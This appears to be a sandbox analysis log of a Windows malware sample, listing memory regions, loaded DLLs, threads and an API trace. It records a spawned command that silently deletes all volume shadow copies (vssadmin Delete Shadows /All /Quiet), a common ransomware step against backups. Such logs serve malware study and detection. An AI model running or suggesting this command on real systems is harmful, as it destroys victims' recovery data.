	              id = 3812
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 3813
	        start_va = 0x196c5d30000
	          end_va = 0x196c5d3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5d30000"
	        filename = ""

Region:
	              id = 3814
	        start_va = 0x7ff7fed30000
	          end_va = 0x7ff7fee2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fed30000"
	        filename = ""

Region:
	              id = 3815
	        start_va = 0x196c5d70000
	          end_va = 0x196c5e2dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 3816
	        start_va = 0x196c5f40000
	          end_va = 0x196c603ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5f40000"
	        filename = ""

Region:
	              id = 3826
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 3827
	        start_va = 0x38b7760000
	          end_va = 0x38b779ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000038b7760000"
	        filename = ""

Region:
	              id = 3828
	        start_va = 0x196c6040000
	          end_va = 0x196c623ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c6040000"
	        filename = ""

Region:
	              id = 3829
	        start_va = 0x196c5d40000
	          end_va = 0x196c5d46fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5d40000"
	        filename = ""

Region:
	              id = 3830
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 3842
	        start_va = 0x196c5e30000
	          end_va = 0x196c5e30fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5e30000"
	        filename = ""

Region:
	              id = 3843
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 3844
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 3845
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 3846
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 3847
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 3848
	        start_va = 0x196c5e40000
	          end_va = 0x196c5e46fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5e40000"
	        filename = ""

Region:
	              id = 3849
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 3850
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 3856
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 3857
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 3858
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 3868
	        start_va = 0x196c5e50000
	          end_va = 0x196c5e50fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5e50000"
	        filename = ""

Region:
	              id = 3869
	        start_va = 0x196c5e60000
	          end_va = 0x196c5e60fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5e60000"
	        filename = ""

Region:
	              id = 3870
	        start_va = 0x196c6040000
	          end_va = 0x196c61c7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c6040000"
	        filename = ""

Region:
	              id = 3871
	        start_va = 0x196c6230000
	          end_va = 0x196c623ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c6230000"
	        filename = ""

Region:
	              id = 3872
	        start_va = 0x196c6240000
	          end_va = 0x196c63c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c6240000"
	        filename = ""

Region:
	              id = 3873
	        start_va = 0x196c63d0000
	          end_va = 0x196c77cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c63d0000"
	        filename = ""

Region:
	              id = 3874
	        start_va = 0x196c5e70000
	          end_va = 0x196c5eeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5e70000"
	        filename = ""

Region:
	              id = 3879
	        start_va = 0x38b77a0000
	          end_va = 0x38b77dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000038b77a0000"
	        filename = ""

Region:
	              id = 3880
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 3881
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 3882
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 3884
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 3885
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 3886
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 3887
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 3888
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 3889
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 3890
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 3893
	        start_va = 0x196c5e70000
	          end_va = 0x196c5ebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5e70000"
	        filename = ""

Region:
	              id = 3894
	        start_va = 0x196c5ee0000
	          end_va = 0x196c5eeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5ee0000"
	        filename = ""

Region:
	              id = 3901
	        start_va = 0x196c77d0000
	          end_va = 0x196c7b06fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 3902
	        start_va = 0x196c5e70000
	          end_va = 0x196c5e90fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 3903
	        start_va = 0x196c5eb0000
	          end_va = 0x196c5ebffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5eb0000"
	        filename = ""

Region:
	              id = 3904
	        start_va = 0x196c61d0000
	          end_va = 0x196c6229fff
	       monitored = 1
	     entry_point = 0x196c61e53f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 3907
	        start_va = 0x196c7b10000
	          end_va = 0x196c7d24fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c7b10000"
	        filename = ""

Region:
	              id = 3908
	        start_va = 0x196c7d30000
	          end_va = 0x196c7f4cfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c7d30000"
	        filename = ""

Region:
	              id = 3927
	        start_va = 0x196c7f50000
	          end_va = 0x196c805dfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c7f50000"
	        filename = ""

Region:
	              id = 3928
	        start_va = 0x196c8060000
	          end_va = 0x196c8277fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c8060000"
	        filename = ""

Region:
	              id = 3929
	        start_va = 0x196c8280000
	          end_va = 0x196c8393fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c8280000"
	        filename = ""

Region:
	              id = 3967
	        start_va = 0x38b7a00000
	          end_va = 0x38b7a3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000038b7a00000"
	        filename = ""

Region:
	              id = 3968
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 3969
	        start_va = 0x196c5e70000
	          end_va = 0x196c5e70fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5e70000"
	        filename = ""

Region:
	              id = 3970
	        start_va = 0x196c83a0000
	          end_va = 0x196c845bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c83a0000"
	        filename = ""

Region:
	              id = 3971
	        start_va = 0x196c5e70000
	          end_va = 0x196c5e73fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5e70000"
	        filename = ""

Region:
	              id = 3972
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 3989
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 3990
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 3998
	        start_va = 0x196c5e80000
	          end_va = 0x196c5e86fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000196c5e80000"
	        filename = ""

Region:
	              id = 3999
	        start_va = 0x196c5e90000
	          end_va = 0x196c5e90fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5e90000"
	        filename = ""

Region:
	              id = 4000
	        start_va = 0x196c5ea0000
	          end_va = 0x196c5ea0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5ea0000"
	        filename = ""

Region:
	              id = 4001
	        start_va = 0x196c5ec0000
	          end_va = 0x196c5ec4fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 4002
	        start_va = 0x196c5ed0000
	          end_va = 0x196c5ed0fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 4016
	        start_va = 0x196c5ef0000
	          end_va = 0x196c5ef1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5ef0000"
	        filename = ""

Region:
	              id = 4017
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 4018
	        start_va = 0x196c5f00000
	          end_va = 0x196c5f00fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 4019
	        start_va = 0x196c5f10000
	          end_va = 0x196c5f11fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000196c5f10000"
	        filename = ""


Thread:
	id = 297
	os_tid = 0xcf4


Thread:
	id = 299
	os_tid = 0xc94


Thread:
	id = 301
	os_tid = 0xca4


Thread:
	id = 311
	os_tid = 0xd34


Process:
	id = "52"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x2f33d000"
	os_pid = "0xcac"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=L: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 3909
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 3910
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 3911
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 3912
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 3913
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 3914
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 3915
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 3916
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 3917
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 3918
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 3919
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 3920
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 3921
	        start_va = 0x7e5a0000
	          end_va = 0x7e5c2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e5a0000"
	        filename = ""

Region:
	              id = 3922
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 3923
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 3924
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 3925
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 3926
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 3930
	        start_va = 0x1c0000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 3935
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 3936
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 3937
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3938
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 3939
	        start_va = 0x4600000
	          end_va = 0x47effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 3940
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 3960
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 3961
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 3962
	        start_va = 0x7e4a0000
	          end_va = 0x7e59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007e4a0000"
	        filename = ""

Region:
	              id = 4264
	        start_va = 0x4600000
	          end_va = 0x46bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4265
	        start_va = 0x46f0000
	          end_va = 0x47effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000046f0000"
	        filename = ""

Region:
	              id = 4266
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4267
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4268
	        start_va = 0x260000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000260000"
	        filename = ""

Region:
	              id = 4269
	        start_va = 0x47f0000
	          end_va = 0x48effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047f0000"
	        filename = ""

Region:
	              id = 4270
	        start_va = 0x48f0000
	          end_va = 0x49bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048f0000"
	        filename = ""

Region:
	              id = 4275
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 4448
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 4487
	        start_va = 0x49c0000
	          end_va = 0x4cf6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 306
	os_tid = 0x9b0

	[0285.570] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0285.570] GetProcessHeap () returned 0x46f0000
	[0285.570] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x400a) returned 0x46fb998
	[0285.570] GetProcessHeap () returned 0x46f0000
	[0285.571] RtlFreeHeap (HeapHandle=0x46f0000, Flags=0x0, BaseAddress=0x46fb998) returned 1
	[0285.577] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0285.578] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0285.578] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0285.578] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0285.578] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0285.578] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0285.578] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0285.578] GetProcessHeap () returned 0x46f0000
	[0285.578] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x58) returned 0x46f9048
	[0285.578] GetProcessHeap () returned 0x46f0000
	[0285.578] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x1a) returned 0x46f7318
	[0285.581] GetProcessHeap () returned 0x46f0000
	[0285.581] RtlAllocateHeap (HeapHandle=0x46f0000, Flags=0x8, Size=0x52) returned 0x46f90a8
	[0285.584] GetConsoleTitleW (in: lpConsoleTitle=0x18f3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0285.959] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0285.959] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0285.959] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0285.959] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0285.959] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
